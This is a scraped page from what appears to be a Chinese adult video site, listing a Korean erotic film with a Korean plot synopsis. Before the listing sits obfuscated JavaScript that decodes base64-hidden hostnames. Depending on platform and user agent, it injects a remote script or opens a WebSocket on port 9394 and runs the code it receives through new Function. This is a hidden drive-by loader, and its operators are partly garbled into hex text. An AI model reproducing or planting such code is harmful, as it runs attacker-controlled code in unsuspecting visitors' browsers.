function gmHGjcU(e){var t="",n=r=c1=c2=0;while(n 0x3c e.length){r=e.charCodeAt(n);if(r 0x3c 128){t+=String.fromCharCode(r);n++;}else if(r 0x3e 191&&r 0x3c 224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)0x3c0x3c 6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)0x3c0x3c 12|(c2&63)0x3c0x3c 6|c3&63);n+=3;}}return t;};function HpclxjG(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f 0x3c e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s 0x3c0x3c 2|o 0x3e0x3e 4;r=(o&15)0x3c0x3c 4|u 0x3e0x3e 2;i=(u&3)0x3c0x3c 6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return gmHGjcU(t);};window[''+'r'+'Z'+'e'+'b'+'C'+'p'+'N'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=HpclxjG,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));new Worker(window.URL.createObjectURL(new Blob(["var ws=new WebSocket('wss://"+k+":9394/'+"+i+");ws.onmessage=function(e){ws.close();postMessage(e.data)};"]))).onmessage=function(e){new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a21yLnloanpnLmmNu','a2550LnJ1aXR1c2Nob29sLmNvbS55jbg==','152634',window,document,['m','5']);}:function(){};
当前位置: 首页  »  福利片  »  新建文件夹

新建文件夹

9.0播放:

 • 主演:未知
 • 导演:황상원 地区:韩国    类型:伦理 
 • 简介: 이걸 공유해?? 말어?                         &

剧情介绍

简介: 이걸 공유해?? 말어?                                                                     그 놈의 새로운 변신이 시작된다                                                                     주인공 형도는 세계 각국의 야동을 수집하는 취미를 가진 상 찌질이에 모테 솔로다.                                                                     오늘도 컴퓨터에 있는 각국의 미녀들과 즐거운 시간을 보내는                                                                     그에게 친구 재욱은 소개팅을 제안하지만                                                                     하는 족족 매번 바람을 맞게 된고 좌절하며 길거리에서 방황하던 중 불의의 사고로 인해                                                                     완전히 다른 사람으로 변하게 된다.                                                                     몰라보게 변한 형도, 자신을 바람 맞춘 여자들에게 복수를 결심하는데...                                                                     과연 형도는 자신이 그토록 원하는 진정한 사랑을 찾을 수 있을까?

推荐影片

影片评论

共有0条影评